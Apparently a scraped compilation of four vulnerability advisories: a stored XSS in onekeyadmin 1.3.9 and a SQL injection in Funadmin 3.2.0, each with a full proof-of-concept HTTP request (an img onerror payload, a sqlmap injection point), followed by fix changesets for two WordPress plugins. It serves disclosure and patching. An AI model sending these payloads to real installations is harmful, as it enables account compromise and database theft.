onekeyadmin v1.3.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Add Administrator module.

1.  Vulnerability affects product:onekeyadmin
2.  Vulnerability affects version 1.3.9
3.  Vulnerability type:storage xss vulnerability（Cross-site scripting）
4.  Vulnerability Details：  
    url  
    http://192.168.3.129:8091/admin1#admin/index

poc POST /admin1/admin/save HTTP/1.1 Host: 192.168.3.129:8091 Content-Length: 224 Accept: \*/\* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.3.129:8091 Referer: http://192.168.3.129:8091/admin1/admin/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close

{"id":"","cover":"","account":"test<img src=1 onerror=alert("xss");>","email":"aa@xxxqq.com","nickname":"aa@xxxqq.com","login\_count":"","group\_id":1,"password":"aa@xxxqq.com","status":1,"create\_time":"","theme":"template"}  

then you can view xss in url  
http://192.168.3.129:8091/admin1#admin/index

CVE-2023-26953: Background administrator management - Adding an administrator has a storage xss vulnerability · Issue #8 · keheying/onekeyadmin

Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the selectFields parameter at \member\MemberLevel.php.

Vulnerability Product:funadmin  
Vulnerability version:.3.2.0  
Vulnerability type:sql injection  
Vulnerability Details：  
Vulnerability location app\\backend\\controller\\member\\MemberLevel.php# is called  
app\\backend\\controller\\member\\Member.php#index method  

After getting the parameter selectFields here, continue to enter  
selectFields method  
app\\common\\traits\\Curd.php#selectList  
  
Finally, enter \\vendor\\topthink\\think-orm\\src\\db\\BaseQuery.php#field is spliced ​​into sql without filtering to cause sql injection

Vulnerability reproduction:  
Background administrator rights  
sqlmap poc  
GET /backend/member.memberLevel/index?parentField=pid&selectFields%5Bname%5D=*&selectFields%5Bvalue%5D=id HTTP/1.1 Host: 192.168.3.129:8092 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D X-Csrf-Token: 57cf5483b08025dc11534643f460d0fc X-Requested-With: XMLHttpRequest Accept-Encoding: gzip

CVE-2023-24781: member.memberLevel#selectFields[name] has sql injection vulnerability · Issue #8 · funadmin/funadmin

The JetBackup – WP Backup, Migrate & Restore plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including 1.3.9. This is due to missing nonce validation on the backup_guard_get_import_backup() function. This makes it possible for unauthenticated attackers to upload arbitrary files to the vulnerable site's server via a forged request, granted they can trick a site's administrator into performing an action such as clicking on a link.

Timestamp:

07/16/2020 08:20:20 AM (3 years ago)

BackupGuard

Message:

Add Backup new version 1.4.0  

Location:

backup/trunk

Files:

  

*   BackupGuard.php (7 diffs)
*   README.txt (2 diffs)
*   backup.php (2 diffs)
*   public/ajax/modalImport.php (1 diff)
*   public/js/sgcloud.js (2 diffs)

**Legend:**

Unmodified

Added

Removed

*   **backup/trunk/BackupGuard.php**
    
    r2337942
    
    r2341420
    
     
    
    282
    
    282
    
        echo 'SG\_AJAX\_REQUEST\_FREQUENCY = "'.$sgAjaxRequestFrequency.'";';
    
    283
    
    283
    
        echo 'function getAjaxUrl(url) {'.
    
    284
    
     
    
            'if (url==="cloudDropbox" || url==="cloudGdrive" || url==="cloudOneDrive") return "'.admin\_url('admin-post.php?action=backup\_guard\_').'"+url;'.
    
     
    
    284
    
            'if (url==="cloudDropbox" || url==="cloudGdrive" || url==="cloudOneDrive") return "'.admin\_url('admin-post.php?action=backup\_guard\_').'"+url+"&token='.wp\_create\_nonce('backupGuardAjaxNonce').'";'.
    
    285
    
    285
    
            'return "'.admin\_url('admin-ajax.php').'";}</script>';
    
    286
    
    286
    
    …
    
    …
    
     
    
    338
    
    338
    
    {
    
    339
    
    339
    
        check\_ajax\_referer('backupGuardAjaxNonce', 'token');
    
    340
    
     
    
        require\_once(SG\_PUBLIC\_AJAX\_PATH.'modalManualBackup.php');
    
     
    
    340
    
        if (is\_admin()) {
    
     
    
    341
    
            require\_once(SG\_PUBLIC\_AJAX\_PATH.'modalManualBackup.php');
    
     
    
    342
    
        }
    
    341
    
    343
    
        exit();
    
    342
    
    344
    
    }
    
    …
    
    …
    
     
    
    511
    
    513
    
    function backup\_guard\_import\_key\_file()
    
    512
    
    514
    
    {
    
     
    
    515
    
        check\_ajax\_referer('backupGuardAjaxNonce', 'token');
    
    513
    
    516
    
        require\_once(SG\_PUBLIC\_AJAX\_PATH.'importKeyFile.php');
    
    514
    
    517
    
    }
    
    …
    
    …
    
     
    
    574
    
    577
    
    function backup\_guard\_cloud\_dropbox()
    
    575
    
    578
    
    {
    
     
    
    579
    
        check\_ajax\_referer('backupGuardAjaxNonce', 'token');
    
    576
    
    580
    
        require\_once(SG\_PUBLIC\_AJAX\_PATH.'cloudDropbox.php');
    
    577
    
    581
    
    }
    
    …
    
    …
    
     
    
    584
    
    588
    
    function backup\_guard\_cloud\_amazon()
    
    585
    
    589
    
    {
    
     
    
    590
    
        check\_ajax\_referer('backupGuardAjaxNonce', 'token');
    
    586
    
    591
    
        require\_once(SG\_PUBLIC\_AJAX\_PATH.'cloudAmazon.php');
    
    587
    
    592
    
    }
    
    …
    
    …
    
     
    
    589
    
    594
    
    function backup\_guard\_cloud\_gdrive()
    
    590
    
    595
    
    {
    
     
    
    596
    
        check\_ajax\_referer('backupGuardAjaxNonce', 'token');
    
    591
    
    597
    
        require\_once(SG\_PUBLIC\_AJAX\_PATH.'cloudGdrive.php');
    
    592
    
    598
    
    }
    
    …
    
    …
    
     
    
    622
    
    628
    
    function backup\_guard\_get\_import\_backup()
    
    623
    
    629
    
    {
    
     
    
    630
    
        check\_ajax\_referer('backupGuardAjaxNonce', 'token');
    
    624
    
    631
    
        require\_once(SG\_PUBLIC\_AJAX\_PATH.'importBackup.php');
    
    625
    
    632
    
    }
    
*   **backup/trunk/README.txt**
    
    r2337942
    
    r2341420
    
     
    
    7
    
    7
    
    Requires at least: 3.8
    
    8
    
    8
    
    Tested up to: 5.4.2
    
    9
    
     
    
    Stable tag: 1.3.9
    
     
    
    9
    
    Stable tag: 1.4.0
    
    10
    
    10
    
    License: GPLv2 or later
    
    11
    
    11
    
    License URI: http://www.gnu.org/licenses/gpl-2.0.html
    
    …
    
    …
    
     
    
    158
    
    158
    
    159
    
    159
    
    \== Changelog ==
    
     
    
    160
    
    \= 1.4.0 =
    
     
    
    161
    
    \* Plugin security improvements
    
     
    
    162
    
    160
    
    163
    
    \= 1.3.9 =
    
    161
    
    164
    
    \* Admin side bug fixed
    
*   **backup/trunk/backup.php**
    
    r2337954
    
    r2341420
    
     
    
    5
    
    5
    
     \* Plugin URI:        https://backup-guard.com/products/backup-wordpress
    
    6
    
    6
    
     \* Description:       Backup Guard is the most complete site backup and restore plugin. We offer the easiest way to backup, restore or migrate your site. You can backup your files, database or both.
    
    7
    
     
    
     \* Version:           1.3.9
    
     
    
    7
    
     \* Version:           1.4.0
    
    8
    
    8
    
     \* Author:            BackupGuard
    
    9
    
    9
    
     \* Author URI:        https://backup-guard.com/products/backup-wordpress
    
    …
    
    …
    
     
    
    17
    
    17
    
    18
    
    18
    
    if (!defined('SG\_BACKUP\_GUARD\_VERSION')) {
    
    19
    
     
    
        define('SG\_BACKUP\_GUARD\_VERSION', '1.3.9');
    
     
    
    19
    
        define('SG\_BACKUP\_GUARD\_VERSION', '1.4.0');
    
    20
    
    20
    
    }
    
    21
    
    21
    
*   **backup/trunk/public/ajax/modalImport.php**
    
    r2218186
    
    r2341420
    
     
    
    65
    
    65
    
                            <span class="input-group-btn">
    
    66
    
    66
    
                                <span class="btn btn-primary btn-file backup-browse-btn">
    
    67
    
     
    
                                    <?php \_backupGuardT('Browse')?>&hellip; <input class="sg-backup-upload-input" type="file" name="files\[\]" data-url="<?php echo admin\_url('admin-ajax.php')."?action=backup\_guard\_importBackup" ?>" data-max-file-size="<?php echo backupGuardConvertToBytes($maxUploadSize.'B'); ?>">
    
     
    
    67
    
                                    <?php \_backupGuardT('Browse')?>&hellip; <input class="sg-backup-upload-input" type="file" name="files\[\]" data-url="<?php echo admin\_url('admin-ajax.php')."?action=backup\_guard\_importBackup&token=".wp\_create\_nonce('backupGuardAjaxNonce') ?>" data-max-file-size="<?php echo backupGuardConvertToBytes($maxUploadSize.'B'); ?>">
    
    68
    
    68
    
                                </span>
    
    69
    
    69
    
                            </span>
    
*   **backup/trunk/public/js/sgcloud.js**
    
    r2198964
    
    r2341420
    
     
    
    48
    
    48
    
        var ajaxHandler = new sgRequestHandler(url, sguploadFile, {
    
    49
    
    49
    
            contentType: false,
    
     
    
    50
    
            token: BG\_BACKUP\_STRINGS.nonce,
    
    50
    
    51
    
            cache: false,
    
    51
    
    52
    
            xhr: function() {  // Custom XMLHttpRequest
    
    …
    
    …
    
     
    
    118
    
    119
    
            }
    
    119
    
    120
    
            else {
    
    120
    
     
    
                var ajaxHandler = new sgRequestHandler(url, {cancel: true});
    
     
    
    121
    
                var ajaxHandler = new sgRequestHandler(url, {cancel: true,token: BG\_BACKUP\_STRINGS.nonce });
    
    121
    
    122
    
                ajaxHandler.callback = function(response){
    
    122
    
    123
    
                    jQuery('.sg-'+storage+'-user').remove();
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2020-36669: Changeset 2341420 – WordPress Plugin Repository

The Envato Elements & Download and Template Kit – Import plugins for WordPress are vulnerable to arbitrary file uploads due to insufficient validation of file type upon extracting uploaded Zip files in the installFreeTemplateKit and uploadTemplateKitZipFile functions. This makes it possible for attackers with contributor-lever permissions and above to upload arbitrary files and potentially gain remote code execution in versions up to and including 1.0.13 of Template Kit – Import and versions up to and including 2.0.10 of Envato Elements & Download.

**envato-elements/trunk/envato-elements.php**

r2614547

r2617529

 

5

5

 \* Author: Envato

6

6

 \* Author URI: https://elements.envato.com/extensions/wordpress/?utm\_source=extensions&utm\_medium=referral&utm\_campaign=elements\_extensions\_wpplugins

7

 

 \* Version: 2.0.10

 

7

 \* Version: 2.0.11

8

8

 \* License: GPLv3 or later

9

9

 \* License URI: https://www.gnu.org/licenses/gpl-3.0.html

…

…

 

31

31

32

32

define( 'ENVATO\_ELEMENTS\_SLUG', 'envato-elements' );

33

 

define( 'ENVATO\_ELEMENTS\_VER', '2.0.10' );

 

33

define( 'ENVATO\_ELEMENTS\_VER', '2.0.11' );

34

34

define( 'ENVATO\_ELEMENTS\_FILE', \_\_FILE\_\_ );

35

35

define( 'ENVATO\_ELEMENTS\_DIR', plugin\_dir\_path( ENVATO\_ELEMENTS\_FILE ) );

**envato-elements/trunk/readme.txt**

r2614547

r2617529

 

5

5

Tested up to: 5.8

6

6

Requires PHP: 5.6

7

 

Stable tag: 2.0.10

 

7

Stable tag: 2.0.11

8

8

License: GPLv3

9

9

License URI: https://www.gnu.org/licenses/gpl-3.0.html

…

…

 

79

79

80

80

\== Changelog ==

 

81

 

82

\= 2.0.11 - 2021-10-21 =

 

83

\* Fix: Swap to using ZipArchive for Template Kit extraction

81

84

82

85

\= 2.0.10 - 2021-09-17 =

**envato-elements/trunk/vendor/template-kit-import/inc/class-importer.php**

r2614547

r2617529

 

43

43

44

44

    /\*\*

45

 

     \* Called when we want to unpack a ZIP file into a folder.

46

 

     \* Assumes the folder exists.

 

45

     \* Extract

 

46

     \*

 

47

     \* Performs the extraction of the zip files to a temporary directory.

 

48

     \* Returns an error if for some reason the ZipArchive utility isn't available.

 

49

     \* Otherwise, Returns a strnig containing the temporary extraction directory

47

50

     \*

48

51

     \* @param string $temporary\_zip\_file

…

…

 

52

55

     \*/

53

56

    private function unpack\_template\_kit\_zip\_to\_folder( $temporary\_zip\_file, $destination\_folder ) {

54

 

        global $wp\_filesystem;

55

 

56

 

        require\_once ABSPATH . '/wp-admin/includes/file.php';

57

 

        \\WP\_Filesystem();

58

 

59

 

        if ( ! $wp\_filesystem instanceof \\WP\_Filesystem\_Base ) {

60

 

            return new \\WP\_Error( 'zip\_error', 'Failed to initialize WP Filesystem' );

 

57

        if ( ! class\_exists( '\\ZipArchive' ) ) {

 

58

            return new \\WP\_Error( 'zip\_error', 'PHP Zip extension not loaded' );

61

59

        }

62

60

63

 

        $unzip\_result = unzip\_file( $temporary\_zip\_file, $destination\_folder );

64

 

        if ( $unzip\_result !== true ) {

65

 

            if ( is\_wp\_error( $unzip\_result ) ) {

66

 

                return $unzip\_result;

 

61

        $allowed\_file\_types = \[ 'json', 'jpg', 'png', 'css', 'html' \];

 

62

 

63

        $zip = new \\ZipArchive();

 

64

 

65

        $zip->open( $temporary\_zip\_file );

 

66

 

67

        $allowed\_files = \[\];

 

68

 

69

        // phpcs:ignore WordPress.NamingConventions.ValidVariableName.UsedPropertyNotSnakeCase

 

70

        for ( $i = 0; $i < $zip->numFiles; $i ++ ) {

 

71

            $filename  = $zip->getNameIndex( $i );

 

72

            $extension = pathinfo( $filename, PATHINFO\_EXTENSION );

 

73

 

74

            if ( in\_array( $extension, $allowed\_file\_types, true ) ) {

 

75

                $allowed\_files\[\] = $filename;

67

76

            }

 

77

        }

68

78

69

 

            return new \\WP\_Error( 'zip\_error', 'Failed to unzip zip file' );

70

 

        }

 

79

        $zip->extractTo( $destination\_folder, $allowed\_files );

 

80

 

81

        $zip->close();

71

82

72

83

        $extracted\_zip\_files = scandir( $destination\_folder );

…

…

 

76

87

            $file\_names = array();

77

88

        }

78

 

        if ( ! $file\_names || ! in\_array( 'manifest.json', $file\_names, true ) || preg\_grep( '/\\.php/i', $file\_names ) ) {

 

89

        if ( ! $file\_names || ! in\_array( 'manifest.json', $file\_names, true ) ) {

79

90

            $this->delete\_template\_kit\_folder( $destination\_folder );

80

91

Tag

#js